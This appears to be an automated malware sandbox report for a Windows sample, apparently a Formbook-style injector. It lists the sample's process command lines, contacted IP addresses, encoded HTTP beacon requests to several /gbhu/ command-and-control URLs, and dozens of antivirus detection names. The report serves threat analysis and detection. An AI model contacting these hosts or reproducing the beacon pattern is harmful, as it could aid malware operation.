Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Jan. 28, 2023, 10:49 p.m. | Jan. 28, 2023, 11:02 p.m. |
-
-
nucctjtro.exe "C:\Users\test22\AppData\Local\Temp\nucctjtro.exe" C:\Users\test22\AppData\Local\Temp\twuhpin.dvd
2128-
nucctjtro.exe "C:\Users\test22\AppData\Local\Temp\nucctjtro.exe"
2220
-
-
IP Address | Status | Action |
---|---|---|
104.21.76.77 | Active | Moloch |
143.92.48.236 | Active | Moloch |
162.0.216.254 | Active | Moloch |
164.124.101.2 | Active | Moloch |
199.59.243.222 | Active | Moloch |
2.57.90.16 | Active | Moloch |
211.149.132.144 | Active | Moloch |
217.70.184.50 | Active | Moloch |
45.33.6.223 | Active | Moloch |
66.112.211.168 | Active | Moloch |
66.96.147.160 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
section | .ndata |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq |
request | GET http://www.bts-exhibition20.com/gbhu/?dwq11ePF=tpqPZatFSWftMZbuFeOnBOSwBNRYNC4bECF+5KuudrHZL+uj6SAhnLM79xl9TgWodfNUMHSE7zon0vuCBBc1ktEpBF17jxL0iiyPMLM=&YabdMo=eHFLyxLS9HiIq |
request | GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3390000.zip |
request | POST http://www.actualabaule.com/gbhu/ |
request | GET http://www.actualabaule.com/gbhu/?dwq11ePF=2pxLiO942t5FkFRjNHyAiMW5bHO63rkjCdflxXdQmiqtiPUBqVrUFlO8JTqg/bEqxMzFYZexGJrShELInTuzWAoQXV3U24qzi0sYkgA=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.govcintria.online/gbhu/ |
request | GET http://www.govcintria.online/gbhu/?dwq11ePF=dVbA+IXcm1YuOJ1N0YfoPOUPspwoFrMI8eGyv/hTd7M6maCfXa3GNmu+O7MNTYOdhYiwJPdemCWc8/TOWhgps6HIHGnlIWhMsDwJ9t4=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.49138.net/gbhu/ |
request | GET http://www.49138.net/gbhu/?dwq11ePF=WL2v/sGFsFIuAk53tX4v3ozaI9MekZ54iiHcVmD4RVE9irnVRUhCIdhzHcX9OStZFhWObZgZr940JPQfa5eUhFHz/csG7i5yqe9ZH20=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.dongshi88.com/gbhu/ |
request | GET http://www.dongshi88.com/gbhu/?dwq11ePF=b1ijv7/tEC2PXjxDsbuxsXva2wZ3D1czsA+lhOYVJxZEUWwbEdFBMQFsyzcPw/mr8NXL74lT/Fd9q4Dp8JhY/9JDjuMN4js97XFbSws=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.adalexs.com/gbhu/ |
request | GET http://www.adalexs.com/gbhu/?dwq11ePF=D1b/tXE1wqN7p4mfTi76DPsviRaFjnrtscBWiPbYkZ2JHeEtyHLUC4ibH92W8gaDc10nQ7RDCV1MC1LMji13NdslOWFcPJvVlGENFow=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.bobblehead8.com/gbhu/ |
request | GET http://www.bobblehead8.com/gbhu/?dwq11ePF=meqTUx5kIEeA9O3K+DspA+9TJQ7rWtYm9pdGl178RL9fSiIP48l7cIqKAbR6uI16zGzDWzC2kHM4w1/jD5NrA8QTbIMv2qGMhL2x80Q=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.bordain.website/gbhu/ |
request | GET http://www.bordain.website/gbhu/?dwq11ePF=Z0JOfegcJus8QT/ga7HhKsxVghDCE41qFhckdElZvPNE+U6wFU3FpNVOM7LfjIcK+KFXTjs52Dx2xmlkwnBEWQpZ+ijccONCTZsjAaQ=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.defituesday.com/gbhu/ |
request | GET http://www.defituesday.com/gbhu/?dwq11ePF=K8gb+vg3lIj7mLsgY2s/Un2w4+nCuuuuWVhNes+vUVynttvh63W50QdwpB+jXhqV1vb6jBT4NlQZn884uDSkCA0C7jdkyYeP3Sv4iJE=&YabdMo=eHFLyxLS9HiIq |
request | POST http://www.actualabaule.com/gbhu/ |
request | POST http://www.govcintria.online/gbhu/ |
request | POST http://www.49138.net/gbhu/ |
request | POST http://www.dongshi88.com/gbhu/ |
request | POST http://www.adalexs.com/gbhu/ |
request | POST http://www.bobblehead8.com/gbhu/ |
request | POST http://www.bordain.website/gbhu/ |
request | POST http://www.defituesday.com/gbhu/ |
file | C:\Users\test22\AppData\Local\Temp\nucctjtro.exe |
host | 104.21.76.77 |
Lionic | Trojan.Win32.Generic.4!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.65205746 |
FireEye | Generic.mg.f5ba8cd2153faf89 |
McAfee | RDN/Generic.dx |
Cylance | Unsafe |
K7AntiVirus | Riskware ( 0040eff71 ) |
Alibaba | Trojan:Win32/Redcap.e666870d |
Cybereason | malicious.2941bb |
Arcabit | Trojan.Generic.D3E2F5F2 |
Cyren | W32/ABRisk.DRNF-3156 |
Symantec | Packed.NSISPacker!g14 |
ESET-NOD32 | a variant of Win32/Injector_AGen.QG |
APEX | Malicious |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.GenericKD.65205746 |
Avast | Win32:InjectorX-gen [Trj] |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Redcap.iqtst |
DrWeb | Trojan.Loader.1278 |
VIPRE | Trojan.GenericKD.65205746 |
McAfee-GW-Edition | BehavesLike.Win32.Dropper.fc |
Emsisoft | Trojan.GenericKD.65205746 (B) |
SentinelOne | Static AI - Suspicious PE |
Webroot | W32.Trojan.GenKD |
Detected | |
Avira | TR/AD.GenShell.qwxpn |
MAX | malware (ai score=88) |
Antiy-AVL | Trojan/Win32.Formbook |
Gridinsoft | Trojan.Win32.Downloader.sa |
Microsoft | Trojan:Win32/Casdet!rfn |
ZoneAlarm | HEUR:Trojan-Spy.Win32.Noon.gen |
GData | Trojan.GenericKD.65205746 |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Trojan/Win.NSISInject.R495658 |
Acronis | suspicious |
BitDefenderTheta | Gen:NN.ZexaF.36212.fqW@aGhmtkei |
ALYac | Gen:Variant.Lazy.263633 |
Malwarebytes | Trojan.Injector |
TrendMicro-HouseCall | TROJ_GEN.R002H0DAR23 |
Rising | Trojan.Injector!8.C4 (TFE:5:4WZSEkuvkMG) |
Ikarus | Trojan.Inject |
Fortinet | W32/Injector_AGen.QG!tr |
AVG | Win32:InjectorX-gen [Trj] |
Panda | Trj/GdSda.A |